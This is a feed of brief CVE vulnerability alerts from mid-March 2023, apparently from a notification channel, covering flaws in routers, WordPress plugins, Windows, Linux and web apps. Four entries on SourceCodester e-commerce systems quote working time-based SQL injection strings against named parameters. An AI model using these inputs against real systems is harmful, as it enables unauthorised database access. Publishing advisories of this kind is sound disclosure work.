| 2023-03-21 20:29:47 |
🚨 CVE-2022-38452A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-03-21 20:29:46 |
🚨 CVE-2022-45636An issue discovered in MEGAFEIS, BOFEI DBD+ Application for IOS & Android v1.4.4 allows attacker to unlock model(s) without authorization via arbitrary API requests.🎖@cveNotify |
|
| 2023-03-21 20:29:42 |
🚨 CVE-2023-25134McAfee Total Protection prior to 16.0.50 may allow an adversary (with full administrative access) to modify a McAfee specific Component Object Model (COM) in the Windows Registry. This can result in the loading of a malicious payload.🎖@cveNotify |
|
| 2023-03-21 20:29:41 |
🚨 CVE-2023-23419Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-21 20:29:40 |
🚨 CVE-2023-24863Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-03-20 23:29:55 |
🚨 CVE-2023-23398Microsoft Excel Spoofing Vulnerability🎖@cveNotify |
|
| 2023-03-20 23:29:54 |
🚨 CVE-2023-23396Microsoft Excel Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-03-20 23:29:53 |
🚨 CVE-2023-23395Microsoft SharePoint Server Spoofing Vulnerability🎖@cveNotify |
|
| 2023-03-20 23:29:49 |
🚨 CVE-2023-23393Windows BrokerInfrastructure Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-20 23:29:48 |
🚨 CVE-2022-45124An information disclosure vulnerability exists in the User authentication functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a disclosure of sensitive information. An attacker can sniff network traffic to leverage this vulnerability.🎖@cveNotify |
|
| 2023-03-20 23:29:47 |
🚨 CVE-2023-23402Windows Media Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-20 23:29:44 |
🚨 CVE-2023-1418A vulnerability classified as problematic was found in SourceCodester Friendly Island Pizza Website and Ordering System 1.0. Affected by this vulnerability is an unknown functionality of the file cashconfirm.php of the component POST Parameter Handler. The manipulation of the argument transactioncode leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223129 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-20 23:29:43 |
🚨 CVE-2023-1416A vulnerability classified as critical has been found in Simple Art Gallery 1.0. Affected is an unknown function of the file adminHome.php. The manipulation of the argument social_facebook leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223128.🎖@cveNotify |
|
| 2023-03-20 23:29:42 |
🚨 CVE-2021-3293emlog v5.3.1 has full path disclosure vulnerability in t/index.php, which allows an attacker to see the path to the webroot/file.🎖@cveNotify |
|
| 2023-03-20 23:29:41 |
🚨 CVE-2023-27102Libde265 v1.0.11 was discovered to contain a segmentation violation via the function decoder_context::process_slice_segment_header at decctx.cc.🎖@cveNotify |
|
| 2023-03-20 23:29:37 |
🚨 CVE-2023-0681Rapid7 InsightVM versions 6.6.178 and lower suffers from an open redirect vulnerability, whereby an attacker has the ability to redirect the user to a site of the attacker’s choice using the ‘page’ parameter of the ‘data/console/redirect’ component of the application. This issue was resolved in the February, 2023 release of version 6.6.179.🎖@cveNotify |
|
| 2023-03-20 23:29:36 |
🚨 CVE-2023-28425Redis is an in-memory database that persists on disk. Starting in version 7.0.8 and prior to version 7.0.10, authenticated users can use the MSETNX command to trigger a runtime assertion and termination of the Redis server process. The problem is fixed in Redis version 7.0.10.🎖@cveNotify |
|
| 2023-03-20 23:29:35 |
🚨 CVE-2023-26262An issue was discovered in Sitecore XP/XM 10.3. As an authenticated Sitecore user, a unrestricted language file upload vulnerability exists the can lead to direct code execution on the content management (CM) server.🎖@cveNotify |
|
| 2023-03-20 21:29:46 |
🚨 CVE-2023-28144KDAB Hotspot 1.3.x and 1.4.x through 1.4.1, in a non-default configuration, allows privilege escalation because of race conditions involving symlinks and elevate_perf_privileges.sh chown calls.🎖@cveNotify |
|
| 2023-03-20 21:29:45 |
🚨 CVE-2023-27234A Cross-Site Request Forgery (CSRF) in /Sys/index.html of Jizhicms v2.4.5 allows attackers to arbitrarily make configuration changes within the application.🎖@cveNotify |
|
| 2023-03-20 21:29:41 |
🚨 CVE-2019-0881An elevation of privilege vulnerability exists when the Windows Kernel improperly handles key enumeration, aka 'Windows Kernel Elevation of Privilege Vulnerability'.🎖@cveNotify |
|
| 2023-03-20 21:29:40 |
🚨 CVE-2019-0863An elevation of privilege vulnerability exists in the way Windows Error Reporting (WER) handles files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'.🎖@cveNotify |
|
| 2023-03-20 21:29:39 |
🚨 CVE-2018-7084A command injection vulnerability is present that permits an unauthenticated user with access to the Aruba Instant web interface to execute arbitrary system commands within the underlying operating system. An attacker could use this ability to copy files, read configuration, write files, delete files, or reboot the device. Workaround: Block access to the Aruba Instant web interface from all untrusted users. Resolution: Fixed in Aruba Instant 4.2.4.12, 6.5.4.11, 8.3.0.6, and 8.4.0.1🎖@cveNotify |
|
| 2023-03-20 21:29:38 |
🚨 CVE-2019-0841An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0730, CVE-2019-0731, CVE-2019-0796, CVE-2019-0805, CVE-2019-0836.🎖@cveNotify |
|
| 2023-03-20 20:29:57 |
🚨 CVE-2019-0810A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0806, CVE-2019-0812, CVE-2019-0829, CVE-2019-0860, CVE-2019-0861.🎖@cveNotify |
|
| 2023-03-20 20:29:56 |
🚨 CVE-2023-23404Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-20 20:29:55 |
🚨 CVE-2023-23405Remote Procedure Call Runtime Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-03-20 20:29:51 |
🚨 CVE-2022-4148The WP OAuth Server (OAuth Authentication) WordPress plugin before 4.2.5 has a flawed CSRF and authorisation check when deleting a client, which could allow any authenticated users, such as subscriber to delete arbitrary client.🎖@cveNotify |
|
| 2023-03-20 20:29:50 |
🚨 CVE-2023-0145The Saan World Clock WordPress plugin through 1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-20 20:29:49 |
🚨 CVE-2023-0175The Responsive Clients Logo Gallery Plugin for WordPress plugin through 1.1.9 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-20 20:29:45 |
🚨 CVE-2023-0340The Custom Content Shortcode WordPress plugin through 4.0.2 does not validate one of its shortcode attribute, which could allow users with a contributor role and above to include arbitrary files via a traversal attack. This could also allow them to read non PHP files and retrieve their content. RCE could also be achieved if the attacker manage to upload a malicious image containing PHP code, and then include it via the affected attribute, on a default WP install, authors could easily achieve that given that they have the upload_file capability.🎖@cveNotify |
|
| 2023-03-20 20:29:44 |
🚨 CVE-2023-0365The React Webcam WordPress plugin through 1.2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-20 20:29:43 |
🚨 CVE-2023-0369The GoToWP WordPress plugin through 5.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-03-20 20:29:39 |
🚨 CVE-2023-0630The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.🎖@cveNotify |
|
| 2023-03-20 20:29:38 |
🚨 CVE-2023-0865The WooCommerce Multiple Customer Addresses & Shipping WordPress plugin before 21.7 does not ensure that the address to add/update/retrieve/delete and duplicate belong to the user making the request, or is from a high privilege users, allowing any authenticated users, such as subscriber to add/update/duplicate/delete as well as retrieve addresses of other users.🎖@cveNotify |
|
| 2023-03-20 20:29:37 |
🚨 CVE-2023-0875The WP Meta SEO WordPress plugin before 4.5.3 does not properly sanitize and escape inputs into SQL queries, leading to a blind SQL Injection vulnerability that can be exploited by subscriber+ users.🎖@cveNotify |
|
| 2023-03-20 11:30:26 |
🚨 CVE-2023-1248Improper Input Validation vulnerability in OTRS AG OTRS (Ticket Actions modules), OTRS AG ((OTRS)) Community Edition (Ticket Actions modules) allows Cross-Site Scripting (XSS).This issue affects OTRS: from 7.0.X before 7.0.42; ((OTRS)) Community Edition: from 6.0.1 through 6.0.34.🎖@cveNotify |
|
| 2023-03-20 11:30:25 |
🚨 CVE-2023-1502A vulnerability was found in SourceCodester Alphaware Simple E-Commerce System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file function/edit_customer.php. The manipulation of the argument firstname/mi/lastname with the input a' RLIKE SLEEP(5) AND 'dAbu'='dAbu leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-223406 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-20 11:30:24 |
🚨 CVE-2023-1503A vulnerability classified as critical has been found in SourceCodester Alphaware Simple E-Commerce System 1.0. This affects an unknown part of the file admin/admin_index.php. The manipulation of the argument username/password with the input admin' AND (SELECT 8062 FROM (SELECT(SLEEP(5)))meUD)-- hLiX leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223407.🎖@cveNotify |
|
| 2023-03-20 11:30:20 |
🚨 CVE-2023-1504A vulnerability classified as critical was found in SourceCodester Alphaware Simple E-Commerce System 1.0. This vulnerability affects unknown code. The manipulation of the argument email/password with the input test1%40test.com ' AND (SELECT 6077 FROM (SELECT(SLEEP(5)))dltn) AND 'PhRa'='PhRa leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223408.🎖@cveNotify |
|
| 2023-03-20 11:30:19 |
🚨 CVE-2023-1505A vulnerability, which was classified as critical, has been found in SourceCodester E-Commerce System 1.0. This issue affects some unknown processing of the file /ecommerce/admin/settings/setDiscount.php. The manipulation of the argument id with the input 201737 AND (SELECT 8973 FROM (SELECT(SLEEP(5)))OoAD) leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223409 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-20 11:30:18 |
🚨 CVE-2015-10096A vulnerability, which was classified as critical, was found in Zarthus IRC Twitter Announcer Bot up to 1.1.0. This affects the function get_tweets of the file lib/twitterbot/plugins/twitter_announcer.rb. The manipulation of the argument tweet leads to command injection. It is possible to initiate the attack remotely. Upgrading to version 1.1.1 is able to address this issue. The name of the patch is 6b1941b7fc2c70e1f40981b43c84a2c20cc12bd3. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-223383.🎖@cveNotify |
|
| 2023-03-20 11:30:17 |
🚨 CVE-2022-4933A vulnerability, which was classified as critical, has been found in ATM Consulting dolibarr_module_quicksupplierprice up to 1.1.6. Affected by this issue is the function upatePrice of the file script/interface.php. The manipulation leads to sql injection. The attack may be launched remotely. Upgrading to version 1.1.7 is able to address this issue. The name of the patch is ccad1e4282b0e393a32fcc852e82ec0e0af5446f. It is recommended to upgrade the affected component. VDB-223382 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-20 06:30:36 |
🚨 CVE-2023-1264NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392.🎖@cveNotify |
|
| 2023-03-20 06:30:35 |
🚨 CVE-2023-1175Incorrect Calculation of Buffer Size in GitHub repository vim/vim prior to 9.0.1378.🎖@cveNotify |
|
| 2023-03-20 06:30:34 |
🚨 CVE-2023-1170Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1376.🎖@cveNotify |
|
| 2023-03-20 06:30:33 |
🚨 CVE-2023-23421Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-20 06:30:32 |
🚨 CVE-2023-23423Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-20 06:30:31 |
🚨 CVE-2023-23420Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-20 06:30:27 |
🚨 CVE-2023-23422Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-03-20 06:30:26 |
🚨 CVE-2023-24856Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-03-20 06:30:25 |
🚨 CVE-2023-24857Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-03-20 06:30:24 |
🚨 CVE-2023-24858Microsoft PostScript and PCL6 Class Printer Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-03-20 06:30:23 |
🚨 CVE-2023-24859Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-03-19 23:29:39 |
🚨 CVE-2023-1498A vulnerability classified as critical has been found in code-projects Responsive Hotel Site 1.0. Affected is an unknown function of the file messages.php of the component Newsletter Log Handler. The manipulation of the argument title leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-223398 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-19 23:29:38 |
🚨 CVE-2023-1499A vulnerability classified as critical was found in code-projects Simple Art Gallery 1.0. Affected by this vulnerability is an unknown functionality of the file adminHome.php. The manipulation of the argument reach_city leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223399.🎖@cveNotify |
|
| 2023-03-19 23:29:37 |
🚨 CVE-2023-1500A vulnerability, which was classified as problematic, has been found in code-projects Simple Art Gallery 1.0. Affected by this issue is some unknown functionality of the file adminHome.php. The manipulation of the argument about_info leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223400.🎖@cveNotify |
|
| 2023-03-19 23:29:36 |
🚨 CVE-2023-1501A vulnerability, which was classified as critical, was found in RockOA 2.3.2. This affects the function runAction of the file acloudCosAction.php.SQL. The manipulation of the argument fileid leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-223401 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-19 21:29:42 |
🚨 CVE-2023-1489A vulnerability has been found in Lespeed WiseCleaner Wise System Monitor 1.5.3.54 and classified as critical. Affected by this vulnerability is an unknown functionality in the library WiseHDInfo64.dll of the component IoControlCode Handler. The manipulation leads to improper access controls. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223375.🎖@cveNotify |
|
| 2023-03-19 21:29:41 |
🚨 CVE-2023-1491A vulnerability was found in Max Secure Anti Virus Plus 19.0.2.1. It has been classified as critical. This affects an unknown part in the library MaxCryptMon.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-223377 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-19 21:29:37 |
🚨 CVE-2023-1493A vulnerability was found in Max Secure Anti Virus Plus 19.0.2.1. It has been rated as problematic. This issue affects some unknown processing in the library MaxProctetor64.sys of the component IoControlCode Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223379.🎖@cveNotify |
|
| 2023-03-19 21:29:36 |
🚨 CVE-2023-1487A vulnerability, which was classified as problematic, has been found in Lespeed WiseCleaner Wise System Monitor 1.5.3.54. This issue affects some unknown processing in the library WiseHDInfo64.dll of the component IoControlCode Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-223373 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-19 21:29:35 |
🚨 CVE-2023-1488A vulnerability, which was classified as problematic, was found in Lespeed WiseCleaner Wise System Monitor 1.5.3.54. Affected is an unknown function in the library WiseHDInfo64.dll of the component IoControlCode Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-223374 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-19 18:29:36 |
🚨 CVE-2023-1496Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.🎖@cveNotify |
|
| 2023-03-19 06:30:02 |
🚨 CVE-2023-22591IBM Robotic Process Automation 21.0.1 through 21.0.7 and 23.0.0 through 23.0.1 could allow a user with physical access to the system due to session tokens for not being invalidated after a password reset. IBM X-Force ID: 243710.🎖@cveNotify |
|
| 2023-03-19 06:30:01 |
🚨 CVE-2023-24229DrayTek Vigor2960 v1.5.1.4 was discovered to contain a command injection vulnerability via the mainfunction.cgi component.🎖@cveNotify |
|
| 2023-03-19 06:29:59 |
🚨 CVE-2022-39216Combodo iTop is an open source, web-based IT service management platform. Prior to versions 2.7.8 and 3.0.2-1, the reset password token is generated without any randomness parameter. This may lead to account takeover. The issue is fixed in versions 2.7.8 and 3.0.2-1.🎖@cveNotify |
|
| 2023-03-19 06:29:57 |
🚨 CVE-2023-25680IBM Robotic Process Automation 21.0.1 through 21.0.5 is vulnerable to insufficiently protecting credentials. Queue Provider credentials are not obfuscated while editing queue provider details. IBM X-Force ID: 247032.🎖@cveNotify |
|
| 2023-03-19 06:29:56 |
🚨 CVE-2020-4927A vulnerability in the Spectrum Scale 5.0.5.0 through 5.1.6.1 core component could allow unauthorized access to user data or injection of arbitrary data in the communication protocol. IBM X-Force ID: 191695.🎖@cveNotify |
|
| 2023-03-19 06:29:54 |
🚨 CVE-2023-26284IBM MQ Certified Container 9.3.0.1 through 9.3.0.3 and 9.3.1.0 through 9.3.1.1 could allow authenticated users with the cluster to be granted administration access to the MQ console due to improper access controls. IBM X-Force ID: 248417.🎖@cveNotify |
|
| 2023-03-19 06:29:53 |
🚨 CVE-2022-46774IBM Manage Application 8.8.0 and 8.9.0 in the IBM Maximo Application Suite is vulnerable to incorrect default permissions which could give access to a user to actions that they should not have access to. IBM X-Force ID: 242953.🎖@cveNotify |
|
| 2023-03-19 06:29:52 |
🚨 CVE-2020-27507The Kamailio SIP before 5.5.0 server mishandles INVITE requests with duplicated fields and overlength tag, leading to a buffer overflow that crashes the server or possibly have unspecified other impact.🎖@cveNotify |
|
| 2023-03-19 06:29:50 |
🚨 CVE-2023-22876IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.7 and 6.1.0.0 through 6.1.2.1 could allow a privileged user to obtain sensitive information that could aid in further attacks against the system. IBM X-Force ID: 244364.🎖@cveNotify |
|
| 2023-03-19 06:29:49 |
🚨 CVE-2022-46773IBM Robotic Process Automation 21.0.0 - 21.0.7 and 23.0.0 is vulnerable to client-side validation bypass for credential pools. Invalid credential pools may be created as a result. IBM X-Force ID: 242951.🎖@cveNotify |
|
| 2023-03-19 06:29:48 |
🚨 CVE-2023-24468Broken access control in Advanced Authentication versions prior to 6.4.1.1 and 6.3.7.2🎖@cveNotify |
|
| 2023-03-19 06:29:47 |
🚨 CVE-2022-48423In the Linux kernel before 6.1.3, fs/ntfs3/record.c does not validate resident attribute names. An out-of-bounds write may occur.🎖@cveNotify |
|
| 2023-03-19 06:29:45 |
🚨 CVE-2022-48424In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur.🎖@cveNotify |
|
| 2023-03-19 06:29:44 |
🚨 CVE-2022-48425In the Linux kernel through 6.2.7, fs/ntfs3/inode.c has an invalid kfree because it does not validate MFT flags before replaying logs.🎖@cveNotify |
|
| 2023-03-19 06:29:43 |
🚨 CVE-2023-28617org-babel-execute:latex in ob-latex.el in Org Mode through 9.6.1 for GNU Emacs allows attackers to execute arbitrary commands via a file name or directory name that contains shell metacharacters.🎖@cveNotify |
|
| 2023-03-19 06:29:42 |
🚨 CVE-2022-48422ONLYOFFICE Docs through 7.3 on certain Linux distributions allows local users to gain privileges via a Trojan horse libgcc_s.so.1 in the current working directory, which may be any directory in which an ONLYOFFICE document is located.🎖@cveNotify |
|
| 2023-03-19 06:29:41 |
🚨 CVE-2023-26805Tenda W20E v15.11.0.6 (US_W20EV4.0br_v15.11.0.6(1068_1546_841)_CN_TDC) is vulnerable to Buffer Overflow via function formIPMacBindModify.🎖@cveNotify |
|
| 2023-03-19 06:29:39 |
🚨 CVE-2023-26806Tenda W20E v15.11.0.6(US_W20EV4.0br_v15.11.0.6(1068_1546_841 is vulnerable to Buffer Overflow via function formSetSysTime,🎖@cveNotify |
|
| 2023-03-19 06:29:38 |
🚨 CVE-2023-26905An issue was discovered in Alphaware - Simple E-Commerce System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /alphaware/details.php?id.🎖@cveNotify |
|
| 2023-03-19 06:29:37 |
🚨 CVE-2023-1495A vulnerability classified as critical was found in Rebuild up to 3.2.3. Affected by this vulnerability is the function queryListOfConfig of the file /admin/robot/approval/list. The manipulation of the argument q leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is c9474f84e5f376dd2ade2078e3039961a9425da7. It is recommended to apply a patch to fix this issue. The identifier VDB-223381 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-19 01:29:43 |
🚨 CVE-2023-1492A vulnerability was found in Max Secure Anti Virus Plus 19.0.2.1. It has been declared as problematic. This vulnerability affects unknown code in the library MaxProc64.sys of the component IoControlCode Handler. The manipulation of the argument SystemBuffer leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-223378 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-19 01:29:42 |
🚨 CVE-2023-1493A vulnerability was found in Max Secure Anti Virus Plus 19.0.2.1. It has been rated as problematic. This issue affects some unknown processing in the library MaxProctetor64.sys of the component IoControlCode Handler. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223379.🎖@cveNotify |
|
| 2023-03-19 01:29:41 |
🚨 CVE-2023-1494A vulnerability classified as critical has been found in IBOS 4.5.5. Affected is an unknown function of the file ApiController.php. The manipulation of the argument emailids leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223380.🎖@cveNotify |
|
| 2023-03-19 01:29:40 |
🚨 CVE-2021-46877jackson-databind 2.10.x through 2.12.x before 2.12.6 and 2.13.x before 2.13.1 allows attackers to cause a denial of service (2 GB transient heap usage per read) in uncommon situations involving JsonNode JDK serialization.🎖@cveNotify |
|
| 2023-03-19 01:29:39 |
🚨 CVE-2023-1489A vulnerability has been found in Lespeed WiseCleaner Wise System Monitor 1.5.3.54 and classified as critical. Affected by this vulnerability is an unknown functionality in the library WiseHDInfo64.dll of the component IoControlCode Handler. The manipulation leads to improper access controls. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223375.🎖@cveNotify |
|
| 2023-03-19 01:29:38 |
🚨 CVE-2023-1490A vulnerability was found in Max Secure Anti Virus Plus 19.0.2.1 and classified as critical. Affected by this issue is some unknown functionality in the library SDActMon.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223376.🎖@cveNotify |
|
| 2023-03-19 01:29:36 |
🚨 CVE-2023-1491A vulnerability was found in Max Secure Anti Virus Plus 19.0.2.1. It has been classified as critical. This affects an unknown part in the library MaxCryptMon.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-223377 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-18 23:29:39 |
🚨 CVE-2023-1486A vulnerability classified as problematic was found in Lespeed WiseCleaner Wise Force Deleter 1.5.3.54. This vulnerability affects unknown code in the library WiseUnlock64.sys of the component IoControlCode Handler. The manipulation leads to improper access controls. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-223372.🎖@cveNotify |
|
| 2023-03-18 23:29:38 |
🚨 CVE-2023-1487A vulnerability, which was classified as problematic, has been found in Lespeed WiseCleaner Wise System Monitor 1.5.3.54. This issue affects some unknown processing in the library WiseHDInfo64.dll of the component IoControlCode Handler. The manipulation leads to denial of service. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-223373 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-18 23:29:37 |
🚨 CVE-2023-28609api/auth.go in Ansible Semaphore before 2.8.89 mishandles authentication.🎖@cveNotify |
|
| 2023-03-18 20:29:38 |
🚨 CVE-2023-28606js/event-graph.js in MISP before 2.4.169 allows XSS via event-graph node tooltips.🎖@cveNotify |
|
| 2023-03-18 20:29:37 |
🚨 CVE-2023-28607js/event-graph.js in MISP before 2.4.169 allows XSS via the event-graph relationship tooltip.🎖@cveNotify |
|
| 2023-03-18 13:29:36 |
🚨 CVE-2023-1483A vulnerability has been found in XiaoBingBy TeaCMS up to 2.0.2 and classified as critical. This vulnerability affects unknown code of the file /admin/getallarticleinfo. The manipulation of the argument searchInfo leads to sql injection. The attack can be initiated remotely. VDB-223366 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-03-18 13:29:35 |
🚨 CVE-2023-1484A vulnerability was found in xzjie cms up to 1.0.3 and classified as critical. This issue affects some unknown processing of the file /api/upload. The manipulation of the argument uploadFile leads to unrestricted upload. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-223367.🎖@cveNotify |
|
| 2023-03-18 11:29:37 |
🚨 CVE-2023-0361A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.🎖@cveNotify |
|
| 2023-03-18 11:29:36 |
🚨 CVE-2023-26113Versions of the package collection.js before 6.8.1 are vulnerable to Prototype Pollution via the extend function in Collection.js/dist/node/iterators/extend.js.🎖@cveNotify |
|
| 2023-03-18 06:29:41 |
🚨 CVE-2023-25282A heap overflow vulnerability in D-Link DIR820LA1_FW106B02 allows attackers to cause a denial of service via the config.log_to_syslog and log_opt_dropPackets parameters to mydlink_api.ccp.🎖@cveNotify |
|
| 2023-03-18 06:29:37 |
🚨 CVE-2022-39214Combodo iTop is an open source, web-based IT service management platform. Prior to versions 2.7.8 and 3.0.2-1, a user who can log in on iTop is able to take over any account just by knowing the account's username. This issue is fixed in versions 2.7.8 and 3.0.2-1.🎖@cveNotify |
|
| 2023-03-18 06:29:36 |
🚨 CVE-2023-26912Cross site scripting (XSS) vulnerability in xenv S-mall-ssm thru commit 3d9e77f7d80289a30f67aaba1ae73e375d33ef71 on Feb 17, 2020, allows local attackers to execute arbitrary code via the evaluate button.🎖@cveNotify |
|
| 2023-03-18 06:29:35 |
🚨 CVE-2023-25345Directory traversal vulnerability in swig-templates thru 2.0.4 and swig thru 1.4.2, allows attackers to read arbitrary files via the include or extends tags.🎖@cveNotify |
|
| 2023-03-18 01:29:36 |
🚨 CVE-2023-27595Cilium is a networking, observability, and security solution with an eBPF-based dataplane. In version 1.13.0, when Cilium is started, there is a short period when Cilium eBPF programs are not attached to the host. During this period, the host does not implement any of Cilium's featureset. This can cause disruption to newly established connections during this period due to the lack of Load Balancing, or can cause Network Policy bypass due to the lack of Network Policy enforcement during the window. This vulnerability impacts any Cilium-managed endpoints on the node (such as Kubernetes Pods), as well as the host network namespace (including Host Firewall). This vulnerability is fixed in Cilium 1.13.1 or later. Cilium releases 1.12.x, 1.11.x, and earlier are not affected. There are no known workarounds.🎖@cveNotify |
|
| 2023-03-18 01:29:35 |
🚨 CVE-2023-28116Contiki-NG is an open-source, cross-platform operating system for internet of things (IoT) devices. In versions 4.8 and prior, an out-of-bounds write can occur in the BLE L2CAP module of the Contiki-NG operating system. The network stack of Contiki-NG uses a global buffer (packetbuf) for processing of packets, with the size of PACKETBUF_SIZE. In particular, when using the BLE L2CAP module with the default configuration, the PACKETBUF_SIZE value becomes larger then the actual size of the packetbuf. When large packets are processed by the L2CAP module, a buffer overflow can therefore occur when copying the packet data to the packetbuf. The vulnerability has been patched in the "develop" branch of Contiki-NG, and will be included in release 4.9. The problem can be worked around by applying the patch manually.🎖@cveNotify |
|
| 2023-03-17 22:29:36 |
🚨 CVE-2023-27594Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.11.15, 1.12.8, and 1.13.1, under specific conditions, Cilium may misattribute the source IP address of traffic to a cluster, identifying external traffic as coming from the host on which Cilium is running. As a consequence, network policies for that cluster might be bypassed, depending on the specific network policies enabled. This issue only manifests when Cilium is routing IPv6 traffic and NodePorts are used to route traffic to pods. IPv6 and endpoint routes are both disabled by default. The problem has been fixed and is available on versions 1.11.15, 1.12.8, and 1.13.1. As a workaround, disable IPv6 routing.🎖@cveNotify |
|
| 2023-03-17 20:29:38 |
